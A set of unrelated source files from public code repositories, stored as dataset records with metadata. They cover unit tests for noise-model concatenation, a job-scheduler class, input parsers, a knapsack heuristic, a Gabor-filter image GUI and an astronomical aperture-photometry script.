self.assertEqual(model123._concatenated_models[1], model1)\n self.assertEqual(model123._concatenated_models[2], model2)\n\n with self.assertRaises(TypeError):\n TestModel() + 1\n\n def test_self_concatenation(self):\n \"\"\"Test adding models to themselves\"\"\"\n model1 = TestModel()\n model2 = model1 + model1\n\n self.assertIsInstance(model2, TestModel)\n self.assertEqual(len(model2), 2)\n\n def test_required_properties(self):\n \"\"\"Test if required properties are correctly copied over\"\"\"\n model1 = TestModel()\n model1._required_properties = [\"a\", \"b\"]\n\n model2 = TestModel()\n model2._required_properties = [\"a\", \"c\"]\n\n model12 = model1 + model2\n\n self.assertEqual(len(model12.required_properties), 3)\n self.assertTrue(\"a\" in model12.required_properties)\n self.assertTrue(\"b\" in model12.required_properties)\n self.assertTrue(\"c\" in model12.required_properties)\n\n model1._required_properties = [\"d\", \"e\"]\n self.assertEqual(len(model12.required_properties), 4)\n self.assertTrue(\"a\" in model12.required_properties)\n self.assertFalse(\"b\" in model12.required_properties)\n self.assertTrue(\"c\" in model12.required_properties)\n self.assertTrue(\"d\" in model12.required_properties)\n self.assertTrue(\"e\" in model12.required_properties)\n\n with self.assertRaises(ValueError):\n model12.required_properties = [\"k\"]\n\n self.assertTrue(model12.validate(a=1, b=2, c=3, d=4, e=5, f=6))\n self.assertTrue(model12.validate(a=1, c=3, d=4, e=5))\n self.assertFalse(model12.validate(a=1, c=3))\n self.assertFalse(model12.validate(d=1, e=3))\n\n def test_compute_model(self):\n \"\"\"Test if the models are executed in the correct order\"\"\"\n model1 = TestModel(3)\n model2 = TestModel(4)\n model12 = model1 + model2\n x = [2]\n model12(x)\n self.assertEqual(x[0], (2 ** 3) ** 4)\n model21 = model2 + model1\n x = [2]\n model21(x)\n self.assertEqual(x[0], (2 ** 4) ** 3)\n\n def test_diff_noise_model_concatenation(self):\n \"\"\"Test concatenation ability of different type of noise models\"\"\"\n\n self.assertEqual(type(A()), A)\n\n self.assertEqual(type(A() + A()), A)\n self.assertEqual(type(A() + B()), A)\n self.assertEqual(type(B() + B()), B)\n self.assertEqual(type(C() + F()), A)\n self.assertEqual(type(F() + C()), A)\n self.assertEqual(type(D() + D()), A)\n self.assertEqual(type(F() + F()), F)\n self.assertEqual(type(E() + B()), A)\n self.assertEqual(type(B() + E()), A)\n self.assertEqual(type(F() + E()), E)\n self.assertEqual(type(E() + F()), E)\n self.assertEqual(type(G() + F()), A)\n\n self.assertEqual(type(A() + A() + A()), A)\n self.assertEqual(type(A() + B() + B()), A)\n self.assertEqual(type(B() + B() + B()), B)\n self.assertEqual(type(C() + F() + G()), A)\n self.assertEqual(type(F() + C() + D()), A)\n self.assertEqual(type(D() + D() + E()), A)\n self.assertEqual(type(F() + F() + F()), F)\n self.assertEqual(type(E() + B() + C()), A)\n self.assertEqual(type(B() + E() + F()), A)\n self.assertEqual(type(F() + E() + F()), E)\n self.assertEqual(type(E() + F() + E()), E)\n self.assertEqual(type(G() + F() + G()), A)\n\n self.assertEqual(type((A() + A()) + (A() + A())), A)\n self.assertEqual(type((A() + B()) + (A() + B())), A)\n self.assertEqual(type((B() + B()) + (B() + B())), B)\n self.assertEqual(type((C() + F()) + (C() + F())), A)\n self.assertEqual(type((F() + C()) + (F() + C())), A)\n self.assertEqual(type((D() + D()) + (D() + D())), A)\n self.assertEqual(type((F() + F()) + (F() + F())), F)\n self.assertEqual(type((E() + B()) + (E() + B())), A)\n 
self.assertEqual(type((B() + E()) + (B() + E())), A)\n self.assertEqual(type((F() + E()) + (F() + E())), E)\n self.assertEqual(type((E() + F()) + (E() + F())), E)\n self.assertEqual(type((G() + F()) + (G() + F())), A)\n\n def test_multiplication(self):\n \"\"\"Test multiplication of models\"\"\"\n\n x = A() * 5\n self.assertEqual(type(x), A)\n self.assertEqual(len(x), 5)\n\n x = 5 * A()\n self.assertEqual(type(x), A)\n self.assertEqual(len(x), 5)\n\n x = 5 * A() * 5\n self.assertEqual(len(x), 25)\n self.assertEqual(type(x), A)\n\n a = A()\n x = a * 1\n self.assertEqual(x, a)\n\n x = 1 * a\n self.assertEqual(a, x)\n\n with self.assertRaises(TypeError):\n A() * B()\n\n with self.assertRaises(TypeError):\n \"a\" * A()\n\n with self.assertRaises(TypeError):\n A() * \"b\"\n\n with self.assertRaises(ValueError):\n -1 * A()\n\n with self.assertRaises(ValueError):\n A() * -1\n\n with self.assertRaises(TypeError):\n 1.5 * A()\n\n with self.assertRaises(TypeError):\n A() * 1.5\n\n with self.assertRaises(TypeError):\n 1.0 * A()\n\n with self.assertRaises(TypeError):\n A() * 1.0\n\n a = A(3) + A(2) * 3 + 2 * A(3)\n x = [2]\n a(x)\n self.assertEqual(len(a), 6)\n self.assertEqual(x[0], (((((2 ** 2) ** 2) ** 2) ** 3) ** 3) ** 3)\n\n ef = 2 * (E(3) + 2 * F(2))\n self.assertEqual(len(ef), 6)\n x = [2]\n ef(x)\n self.assertEqual(x[0], (((((2 ** 3) ** 2) ** 2) ** 3) ** 2) ** 2)\n\n def test_diamond_model(self):\n \"\"\"Test logic when adding models with multiple inheritance (such as diamond structure of models)\"\"\"\n\n # since H subclasses both C and F..\n class H(F, C):\n pass\n\n self.assertEqual(type(H() + C()), A) # Should this be CC?\n self.assertEqual(type(H() + F()), F) # Should this be AC?\n self.assertEqual(type(H() + H()), F) # What should this be?\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"danilopag/Quantum-Internet-Payment","sub_path":"lib/python3.10/site-packages/netsquid/components/models/tests/test_concatenatingmodels.py","file_name":"test_concatenatingmodels.py","file_ext":"py","file_size_in_byte":21885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
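The long `test_diff_noise_model_concatenation` table implies a resolution rule for the class of `m1 + m2`: take each operand's `concatenation_class()`, keep the more general one when they are related, otherwise fall back to their nearest common concatenation class. The sketch below is a hedged guess that reproduces those expectations on a reduced hierarchy; it is not NetSquid's actual implementation:

# Illustrative resolution rule for the result class of `m1 + m2`.
class A:
    @classmethod
    def concatenation_class(cls):
        return A

class B(A):
    @classmethod
    def concatenation_class(cls):
        return B

class F(A):
    @classmethod
    def concatenation_class(cls):
        return F

def result_class(m1, m2):
    cc1, cc2 = type(m1).concatenation_class(), type(m2).concatenation_class()
    if issubclass(cc2, cc1):
        return cc1                      # keep the more general class
    if issubclass(cc1, cc2):
        return cc2
    for base in cc1.mro():              # nearest common concatenation class
        cc = getattr(base, "concatenation_class", None)
        if cc is not None and issubclass(cc2, cc()):
            return cc()
    raise TypeError("models share no concatenation class")

assert result_class(B(), B()) is B
assert result_class(B(), F()) is A      # unrelated branches collapse to A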
+{"seq_id":"10766675682","text":"import time\nimport logging\n\nfrom Cobalt.Util import init_cobalt_config, get_config_option\nfrom Cobalt.DataTypes.ProcessGroup import ProcessGroup\n\n_logger = logging.getLogger(__name__)\n\ninit_cobalt_config()\n\nPGROUP_STARTUP_TIMEOUT = float(get_config_option('alpssystem', 'pgroup_startup_timeout', 120.0))\nUSER_SESSION_HOSTS = [host.strip() for host in\n get_config_option('alpssystem', 'user_session_hosts', '').split(':')]\n\nclass ALPSProcessGroup(ProcessGroup):\n '''ALPS-specific PocessGroup modifications.'''\n\n def __init__(self, spec):\n super(ALPSProcessGroup, self).__init__(spec)\n self.alps_res_id = spec.get('alps_res_id', None)\n self.interactive_complete = False\n now = int(time.time())\n self.startup_timeout = int(spec.get(\"pgroup_startup_timeout\",\n now + PGROUP_STARTUP_TIMEOUT))\n\n def start(self):\n '''Start the process group. The ALPS version also sets the host to use.\n This host is in a list provided by the configuration file. If the host\n has an alps_script_forker instance running on it, those currently\n running jobs will be taken into account when selecting where to run.\n\n The forker host with the lowest number of locations\n\n Args:\n None\n\n Returns:\n None\n\n Raises:\n ProcessGroupStartupError: The start for the process group has failed\n and no child process id has been returned.\n\n Side Effects:\n Prompts the specified forker to start a job. In the event of an\n interactive job, sets a fake head pid (1) and notes which host\n should be used for the interactive job launch.\n\n '''\n if self.mode == 'interactive':\n if len(USER_SESSION_HOSTS):\n pass\n return super(ALPSProcessGroup, self).start()\n","repo_name":"ido/cobalt","sub_path":"src/lib/Components/system/ALPSProcessGroup.py","file_name":"ALPSProcessGroup.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"13035580323","text":"from dataclasses import dataclass\nfrom urllib.parse import urlparse\nimport re\nfrom exceptions import RtsfUrlParseError, PhoneParseError\n\n\nclass BaseParser:\n def __init__(self, value: str) -> None:\n self._value = value\n\n\n@dataclass\nclass RtsfUrlParsingResult:\n url: str\n evks_player_id: int\n\n\nclass RtsfUrlParser(BaseParser):\n \"\"\"https://rtsf.ru/ratings/player/{evks_player_id}\"\"\"\n\n player_path_re = re.compile(r\"(^/ratings/player/)([0-9]+$)\")\n\n def parse(self) -> RtsfUrlParsingResult:\n url = self._value.strip()\n parsed = urlparse(url)\n\n if parsed.netloc != \"rtsf.ru\":\n raise RtsfUrlParseError(\"Must be rtsf.ru\", url)\n\n path_match = self.player_path_re.match(parsed.path)\n if not path_match:\n raise RtsfUrlParseError(\"URL path does not match expected regexp\", url)\n\n player_id = int(path_match.groups()[1])\n return RtsfUrlParsingResult(url=url, evks_player_id=player_id)\n\n\nclass PhoneParser(BaseParser):\n phone_re = re.compile(r\"^(\\+7|7|8)\\d{10}$\")\n\n def parse(self) -> str:\n phone = (\n self._value.strip()\n .replace(\" \", \"\")\n .replace(\"-\", \"\")\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n )\n phone_match = self.phone_re.match(phone)\n if not phone_match:\n raise PhoneParseError(\"Phone does not match expected regexp\", phone)\n\n return self._format_phone(phone_match.group())\n\n def _format_phone(self, parsed_phone: str) -> str:\n if parsed_phone.startswith(\"7\") or parsed_phone.startswith(\"8\"):\n phone = parsed_phone[1:]\n else:\n phone = parsed_phone[2:]\n\n return \"+7 ({prefix}) {first}-{second}-{third}\".format(\n prefix=phone[:3], first=phone[3:6], second=phone[6:8], third=phone[8:]\n )\n","repo_name":"nkuznetsov44/foospollbot","sub_path":"foospollbot/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9066065803","text":"from sys import argv\r\nfrom time import time\r\n\r\n#usage heuristic.py -time/-notime path_to_input_file\r\nID_pos = 0\r\nn_pos = 1\r\nM_pos = 2\r\nstart_pos = 3\r\n\r\n#kontrola parametru\r\ndef checkParam():\r\n try:\r\n if argv[1] != '-time' and argv[1] != '-notime':\r\n return False\r\n spam = argv[2]\r\n except IndexError:\r\n return False\r\n return True\r\n\r\n#porovnavaci kriterium sortu\r\ndef getKey(elem):\r\n return elem[2]\r\n\r\n#reseni\r\ndef solve(n, M, buffer):\r\n buffer.sort(key=getKey, reverse=True) #serazeni podle heuristiky\r\n bagWeight = 0\r\n bagPrice = 0\r\n usedItems = []\r\n for x in buffer: #pridavani polozek do zaplneni batohu\r\n if bagWeight + x[0] <= M:\r\n bagWeight = bagWeight + x[0]\r\n bagPrice = bagPrice + x[1]\r\n usedItems.append(x[3])\r\n else:\r\n break\r\n return bagPrice, usedItems\r\n\r\n\r\ndef main():\r\n #kontrola parametru, otevreni souboru\r\n if not checkParam():\r\n print('Invalid parameters')\r\n exit(1)\r\n try:\r\n f = open(argv[2])\r\n except FileNotFoundError:\r\n print('File does not exist')\r\n exit(1)\r\n #nacteni a parsovani souboru\r\n lines = f.readlines()\r\n\r\n for line in lines:\r\n words = line.split(' ')\r\n buffer = []\r\n try: #prochazeni a ukladani instanci\r\n ID = int(words[ID_pos])\r\n n = int(words[n_pos])\r\n M = int(words[M_pos])\r\n index = 0\r\n i = 0\r\n while i < 2 * n:\r\n weight = int(words[start_pos + i])\r\n price = int(words[start_pos + i + 1])\r\n buffer.append((weight, price, price / weight, index))\r\n i = i + 2\r\n index = index + 1\r\n except IndexError:\r\n print('Invalid data format')\r\n exit(1)\r\n except ValueError:\r\n print('Invalid data format')\r\n exit(1)\r\n start_time = time() #mereni casu reseni instance\r\n price, usedItems = solve(n, M, buffer) #reseni instance\r\n if argv[1] == '-time': #vypis reseni a popripade casu\r\n stop_time = time()\r\n print(\"--- Instance %s completed, time %s seconds ---\" % (ID, stop_time - start_time))\r\n print(ID, n, price, end=' ')\r\n for x in range(n):\r\n if x in usedItems:\r\n print('', '1', end='')\r\n else:\r\n print('', '0', end='')\r\n print('')\r\n\r\nif __name__ == '__main__':\r\n start_time = time()#mereni celkoveho casu\r\n main()\r\n if argv[1] == '-time':\r\n stop_time = time()\r\n print('Total time: %s seconds' % (stop_time - start_time))","repo_name":"vojtyys/PAA_1","sub_path":"heuristic.py","file_name":"heuristic.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8497590736","text":"import cv2\r\nimport PySimpleGUI as sg\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport webbrowser\r\nfrom math import pi\r\n\r\nthresh=255\r\ngotImg=False\r\ngotTImg=False\r\nurl = \"https://homepages.inf.ed.ac.uk/rbf/CVonline/LOCAL_COPIES/TRAPP1/filter.html\"\r\n\r\nsg.theme('GreenTan')\r\nphotoO=[[sg.Image('',k='orig')]]\r\nphotoU=[[sg.Image('',background_color='black',k='updated')]]\r\n\r\ndef win1():\r\n layout1=[[sg.Input(size=80,key='fileB',enable_events=True),sg.FileBrowse(button_text='Browse All')],\r\n [sg.Frame('Original',photoO,size=(640,360),element_justification='center'),\r\n sg.Frame('Updated',photoU,size=(640,360),element_justification='center')],\r\n [sg.vbottom(sg.Text(\"Kernel Size:\")),sg.Slider(range=(1,10),orientation='h',default_value=1,enable_events=True,resolution=1,k='ksize')],\r\n #Kernel Size:\r\n [sg.vbottom(sg.Text(\"Sigma \")),sg.Slider(range=(0.4,2.5),orientation='h',default_value=0.4,enable_events=True,resolution=0.1,k='sigma')],\r\n\r\n [sg.vbottom(sg.Text(\"Theta \")),sg.Slider(range=(0,pi),orientation='h',default_value=0,enable_events=True,resolution=pi/16,k='theta')],\r\n\r\n [sg.vbottom(sg.Text(\"Lambda \")),sg.Slider(range=(1,5),orientation='h',default_value=1,enable_events=True,resolution=1,k='hl3')],\r\n\r\n [sg.vbottom(sg.Text(\"Gamma \")),sg.Slider(range=(0.2,1),orientation='h',default_value=0.2,enable_events=True,resolution=0.1,k='hulk')],\r\n\r\n [sg.vbottom(sg.Text(\"Psi \")),sg.Slider(range=(-pi,pi),orientation='h',default_value=0,enable_events=True,resolution=pi/8,k='spy')],\r\n [sg.Save()]]\r\n return sg.Window('Image Processing - Gabor Filter',layout1,relative_location=(0,-100),finalize=True)\r\n\r\n\r\ndef win2():\r\n layout2 = [[sg.Text(f'''General Instructions\r\n1. If the image output does not get updated recheck the selected checkbox to update output\r\n\r\n2.Input Image from your local directory, It can only read Image Files, any other file type will lead to error.\r\n\r\n3. Image can be of any dimensions, the implementation here will automatically modify the dimensions to (Width=640px,\r\nLength= 360px) \r\n\r\n4. The slider Values here represents the threshold for the five primary properties: Kernel Size,Sigma, Theta ,\r\nlambda,gamma and psi\r\n\r\n5.The Output Image can be saved by clicking on the save button, The default format is .png \r\n\r\n6. To access additional theory you require Internet access\r\n\r\n7. 
If you select the save option and close without specifying the save directory the module fails \r\n\r\n***************************************************************************\r\nImplementation by:\r\n\r\nViswadruth Akkaraju, Atanu Wadhwa and K Priya \r\n\r\nMachine Perception and Cognition class \r\n\r\nSRM Institute of Science and Technology\r\n***************************************************************************''', font='Lucida', size=(50, 33))],\r\n [sg.Button('Hyperlink to theory', font='Lucida', enable_events=True, key=\"-LINK-\")]]\r\n\r\n return sg.Window('Help', layout2, finalize=True)\r\n\r\nwindow1, window2 = win1(), win2()\r\n\r\ndef rez(image):\r\n color_converted = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n pil_image = Image.fromarray(color_converted)\r\n x = ImageOps.pad(pil_image, (640, 360), color=None, centering=(0.5, 0.5))\r\n np_img = np.array(x)\r\n opencv_image = cv2.cvtColor(np_img, cv2.COLOR_RGB2BGR)\r\n return opencv_image\r\n\r\nwhile True:\r\n window, event, values = sg.read_all_windows()\r\n if event == 'fileB':\r\n img=cv2.imread(values['fileB'])\r\n img = rez(img)\r\n window['orig'].update(data=cv2.imencode('.ppm', img)[1].tobytes())\r\n window['updated'].update(data=cv2.imencode('.ppm', img)[1].tobytes())\r\n gotImg=True\r\n fPath=values['fileB'].rsplit('/',1)[0]\r\n\r\n if gotImg:\r\n temp = int(values['ksize'])\r\n kernel = (temp, temp)\r\n kern = cv2.getGaborKernel(ksize=kernel, sigma=float(values['sigma']), theta=float(values['theta']),\r\n lambd=int(values['hl3']), gamma=float(values['hulk']), psi=float(values['spy']),\r\n ktype=cv2.CV_32F)\r\n kern /= 1.5 * kern.sum()\r\n img_f = cv2.filter2D(img, cv2.CV_8UC3, kern)\r\n img_f = np.maximum(np.zeros_like(img), img_f, np.zeros_like(img))\r\n window['updated'].update(data=cv2.imencode('.png', img_f)[1].tobytes())\r\n gotTImg=True\r\n\r\n if event == 'Save' and gotTImg:\r\n saveFile= sg.popup_get_file('',save_as=True,no_window=True,\r\n initial_folder=fPath,default_extension='.png')\r\n cv2.imwrite(saveFile,img_f)\r\n\r\n if event in (sg.WIN_CLOSED, 'Exit'):\r\n sg.popup('Close all windows')\r\n break\r\n\r\n if event == '-LINK-':\r\n sg.popup('Redirect to website')\r\n webbrowser.open(url)\r\n\r\nwindow.close()","repo_name":"ICB-TO/Image-Processing-simulation-modules","sub_path":"gabfilt.py","file_name":"gabfilt.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
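The filtering step in the GUI above is just `cv2.getGaborKernel` followed by `cv2.filter2D`. A minimal non-GUI version on a synthetic image, so it runs without an input file (parameter values are arbitrary examples):

import cv2
import numpy as np

# Synthetic 640x360 BGR image standing in for the loaded file.
img = np.random.randint(0, 256, (360, 640, 3), dtype=np.uint8)
kern = cv2.getGaborKernel(ksize=(9, 9), sigma=1.5, theta=np.pi / 4,
                          lambd=3, gamma=0.5, psi=0, ktype=cv2.CV_32F)
kern /= 1.5 * kern.sum()          # same normalisation the GUI applies
filtered = cv2.filter2D(img, cv2.CV_8UC3, kern)
print(filtered.shape)             # (360, 640, 3)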
+{"seq_id":"1443068429","text":"from dataclasses import dataclass\n\n@dataclass\nclass Local:\n name: str\n time: str\n master_rank: str\n skill_name: str\n flavor: str\n start: str\n over: str\n description: str\n ver: str\n ver_time: int\n\n# local\njp_local = Local(\n name='jp_name',\n time='jp_time',\n master_rank='jp_master_rank',\n skill_name='jp_skill_name',\n flavor='jp_flavor',\n start='jp_start',\n over='jp_over',\n description='jp_description',\n ver='jp',\n ver_time=9\n)\nas_local = Local(\n name='as_name',\n time='as_time',\n master_rank='as_master_rank',\n skill_name='as_skill_name',\n flavor='as_flavor',\n start='as_start',\n over='as_over',\n description='as_description',\n ver='as',\n ver_time=8\n)\n","repo_name":"zkelly3/MLTD-Data","sub_path":"web/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74763039259","text":"import math as m\n\ndef main():\n n = eval(input(\"What number in the Fibonnaci sequence would you like to see?: \"))\n count = 0\n x = 1\n y = 0\n\n while count < n:\n count = count + 1\n z = x + y\n x = y\n y = z\n print(z)\n\nmain()\n","repo_name":"drycode/zelle-python","sub_path":"chap08/exercise_1.py","file_name":"exercise_1.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"69"}
+{"seq_id":"19807738776","text":"from unittest import TestCase\nfrom nesta.packages.nlp_utils.ngrammer import Ngrammer\n\n\nclass TestNgrammer(TestCase):\n def test_ngrammer(self):\n ngrammer = Ngrammer(database=\"production_tests\")\n ngrammer.ngrams.clear()\n ngrammer.ngrams[3].add('convolutional_neural_networks')\n ngrammer.ngrams[3].add('bed_and_breakfast')\n ngrammer.ngrams[2].add('neural_networks')\n document = (\"This is a document about machine \"\n \"learning, convolutional neural networks, \"\n \"neural networks and bed and breakfast\")\n processed_doc = ngrammer.process_document(document)\n for _, ngrams in ngrammer.ngrams.items():\n for ng in ngrams:\n self.assertIn(ng, processed_doc[0])\n","repo_name":"nestauk/old_nesta_daps","sub_path":"nesta/packages/nlp_utils/tests/test_ngrammer.py","file_name":"test_ngrammer.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"12330684770","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom astropy.stats import sigma_clipped_stats\nfrom matplotlib.patches import Circle\nfrom photutils import CircularAperture, CircularAnnulus, aperture_photometry\nfrom astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom photutils.utils import calc_total_error\nimport argparse\nimport logging\nimport sys\nfrom astropy.wcs import WCS\n\n# In[2]:\ndef get_logger(namespace, level='DEBUG', logfile=None):\n logger = logging.getLogger(namespace)\n formatter = logging.Formatter('%(name)s [l %(lineno)d] - %(levelname)s - %(message)s')\n\n if logfile is None:\n handler = logging.StreamHandler(sys.stdout)\n\n else:\n handler = logging.FileHandler(logfile)\n\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(level)\n return logger\n\n\ndef make_cutouts(\n image_path: str,\n position,\n half_size\n):\n data = fits.getdata(image_path)\n y_image_size, x_image_size = np.shape(data)\n x, y = position\n # logger.debug(f'{x},{y},{np.shape(data)}')\n if np.logical_and(x < half_size,y < half_size):\n cutout = data[0:y+half_size+1, 0:x+half_size+1]\n n_xpix = half_size-y\n n_ypix = half_size-x\n cutout = np.pad(cutout, ((n_ypix, 0), (n_xpix, 0)), 'constant')\n\n elif np.logical_and(x+half_size+1 > x_image_size, y+half_size+1 > y_image_size):\n cutout = data[y - half_size: y_image_size, x-half_size, x_image_size]\n n_xpix = (half_size+x+1) - x_image_size\n n_ypix = (half_size+y+1) - y_image_size\n cutout = np.pad(cutout, ((0, n_ypix), (0, n_xpix)), 'constant')\n\n elif y < half_size:\n logger.info(f'Cutout parameters are {y + half_size + 1}, {x - half_size}, {x + half_size + 1},{y_image_size},'\n f'{x_image_size}')\n cutout = data[0:y + half_size + 1, x - half_size:x + half_size + 1]\n n_pix = half_size - y\n cutout = np.pad(cutout, ((n_pix, 0), (0, 0)), 'constant')\n\n elif y + half_size + 1 > y_image_size:\n cutout = data[y - half_size: y_image_size, x - half_size: x + half_size + 1]\n n_pix = (half_size + y + 1) - y_image_size\n cutout = np.pad(cutout, ((0, n_pix), (0, 0)), 'constant')\n\n elif x < half_size:\n cutout = data[y - half_size: y + half_size + 1, 0:x + half_size + 1]\n n_pix = half_size - x\n cutout = np.pad(cutout, ((0, 0), (n_pix, 0)), 'constant')\n elif x + half_size > x_image_size:\n cutout = data[y - half_size:y + half_size + 1, x - half_size:x_image_size]\n n_pix = (half_size + x + 1) - x_image_size\n cutout = np.pad(cutout, ((0, 0), (0, n_pix)), 'constant')\n else:\n cutout = data[y - half_size:y + half_size + 1, x - half_size:x + half_size + 1]\n return cutout\n\n\n# In[73]:\n\n\ndef get_aperture_counts(diff_cutout, aper_diameter, bkg_in_diameter, bkg_out_diameter, x_offset = None, \n y_offset = None, gain=None, plot=False):\n\n # w = WCS(header)\n # x,y = w.all_world2pix(ra,dec,0)\n x, y = int(diff_cutout.shape[0] / 2), int(diff_cutout.shape[1] / 2)\n if x_offset is not None:\n x += x_offset\n y += y_offset\n if plot:\n fig, ax = plt.subplots()\n m, s = np.nanmean(diff_cutout), np.nanstd(diff_cutout)\n im = ax.imshow(diff_cutout, interpolation='nearest', cmap='gray',\n vmin=m - s, vmax=m + 10 * s, origin='lower')\n # c = Circle(xy=(x_img, y_img),radius=15)\n\n c = Circle(xy=(x, y), radius=aper_diameter / 2)\n c1 = Circle(xy=(x, y), radius=bkg_in_diameter / 2)\n c2 = Circle(xy=(x, y), radius=bkg_out_diameter / 2)\n c.set_facecolor('none')\n c.set_edgecolor('red')\n c1.set_facecolor('none')\n c1.set_edgecolor('red')\n 
c2.set_facecolor('none')\n c2.set_edgecolor('red')\n ax.add_artist(c)\n ax.add_artist(c1)\n ax.add_artist(c2)\n ax.set_xlim(x - 30, x + 30)\n ax.set_ylim(y - 30, y + 30)\n plt.savefig(r'aper_phot.pdf',bbox_inches='tight')\n\n aperture = CircularAperture((x, y), r=aper_diameter)\n annulus_aperture = CircularAnnulus((x, y), r_in=bkg_in_diameter / 2, r_out=bkg_out_diameter / 2)\n\n annulus_masks = annulus_aperture.to_mask(method='center')\n annulus_data = annulus_masks.multiply(diff_cutout)\n mask = annulus_masks.data\n annulus_data_1d = annulus_data[mask > 0]\n bkg_mean, bkg_median, bkg_std = sigma_clipped_stats(annulus_data_1d, sigma=2)\n # print(bkg_mean, bkg_median)\n bkg = np.zeros(diff_cutout.shape) + bkg_median\n bkg_error = np.zeros(diff_cutout.shape) + bkg_std\n\n aperture_mask = aperture.to_mask(method='center')\n \n if gain is None:\n gain = 1\n print('Gain not provided, setting gain to 1, uncertainties will be incorrect (underestimated)')\n \n effective_gain = gain\n error = calc_total_error(diff_cutout, bkg_error, effective_gain)\n phot_table = aperture_photometry(diff_cutout - bkg, aperture, error=error)\n counts = phot_table['aperture_sum'][0]\n counts_err = phot_table['aperture_sum_err'][0]\n \n return counts, counts_err\n\n\ndef aper_photometry(imgname, x, y, zp, aper_diameter, bkg_in_diameter, bkg_out_diameter, gain=None, cutout_size=None, plot=False):\n x_int, y_int = int(x), int(y)\n x_offset, y_offset = x - x_int, y - y_int\n position=(x_int, y_int)\n \n if cutout_size is None:\n cutout_size = bkg_out+20\n \n cutout = make_cutouts(imgname,position,half_size=int(cutout_size))\n\n counts, countserr = get_aperture_counts(diff_cutout=cutout, aper_diameter=aper_diameter, bkg_in_diameter=bkg_in, bkg_out_diameter=bkg_out, x_offset=x_offset, y_offset=y_offset, gain=gain, plot=plot)\n\n mag = -2.5*np.log10(counts) + zp\n magunc = 1.086*countserr/counts\n\n return mag, magunc\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"img\",type=str,help=\"Image name\")\n parser.add_argument(\"--ra\",type=float,default=None,help=\"RA\")\n parser.add_argument(\"--dec\",type=float,default=None,help=\"Dec\")\n parser.add_argument(\"--x\",type=float,default=None,help=\"x coordinate\")\n parser.add_argument(\"--y\",type=float,default=None,help=\"y coordinate\")\n parser.add_argument(\"--zp_key\",type=str,default='TMC_ZP',help=\"zeropoint key in header\")\n parser.add_argument(\"--gain_key\",type=str,default='GAIN',help=\"gain key in header\")\n parser.add_argument(\"--zp\",type=float,default=None,help=\"zeropoint\")\n parser.add_argument(\"--gain\",type=float,default=None,help=\"gain\")\n parser.add_argument(\"--aper\",type=float,default=5,help=\"aperture diameter\")\n parser.add_argument(\"--bkg_in\",type=float,default=20,help=\"background inner annulus diameter\")\n parser.add_argument(\"--bkg_out\",type=float,default=30,help=\"background outer annulus diameter\")\n parser.add_argument(\"--plot\",action='store_true', help=\"Plot thumbnail with apertures\")\n parser.add_argument(\"--cutout_size\",type=float,default=None,help=\"Cutout size for display\")\n\n\n args = parser.parse_args()\n\n logger = get_logger(__name__)\n \n\n imgname = args.img\n zp_key = args.zp_key\n gain_key = args.gain_key\n zp = args.zp\n cutout_size = args.cutout_size\n\n if zp is None:\n try:\n zp = float(fits.getval(imgname, zp_key))\n except KeyError:\n zp = 0\n logging.warning(f'Zeropoint not specified, or not found in 
header. Setting it to {zp}')\n\n x, y = args.x, args.y\n ra, dec = args.ra, args.dec\n if args.x is None:\n header = fits.getheader(imgname)\n wcs = WCS(header)\n if np.logical_or(ra is None, dec is None):\n err = 'Ra/Dec and x/y are not specified. Please specify either'\n logger.error(err)\n raise ValueError\n x, y = wcs.all_world2pix(ra,dec,0)\n\n logger.info(f'Setting x/y x : {x}, y:{y}')\n\n gain = args.gain\n\n if gain is None:\n try:\n gain = float(fits.getval(imgname, gain_key))\n\n except KeyError:\n gain = 1\n logger.warn(f'Gain not specified, or found in header. Setting to {gain}')\n\n\n aper_radius = args.aper\n bkg_in = args.bkg_in\n bkg_out = args.bkg_out\n mag, magunc = aper_photometry(imgname, x=x, y=y, zp=zp, aper_diameter=aper_radius, bkg_in_diameter=bkg_in, bkg_out_diameter=bkg_out, gain=gain, plot=args.plot, cutout_size=cutout_size)\n logger.info(f'Mag: {mag}, magerr: {magunc}')","repo_name":"virajkaram/ztf_utils","sub_path":"aperture_photometry.py","file_name":"aperture_photometry.py","file_ext":"py","file_size_in_byte":8535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
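The final step in `aper_photometry` converts background-subtracted counts to a magnitude: mag = -2.5*log10(counts) + zp, with sigma_mag ~ 1.086 * counts_err / counts (1.086 = 2.5/ln 10). A quick numeric check with made-up counts and zeropoint:

import numpy as np

counts, counts_err, zp = 15000.0, 120.0, 27.5
mag = -2.5 * np.log10(counts) + zp
mag_err = 1.086 * counts_err / counts        # first-order error propagation
print(f"{mag:.3f} +/- {mag_err:.4f}")        # 17.060 +/- 0.0087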
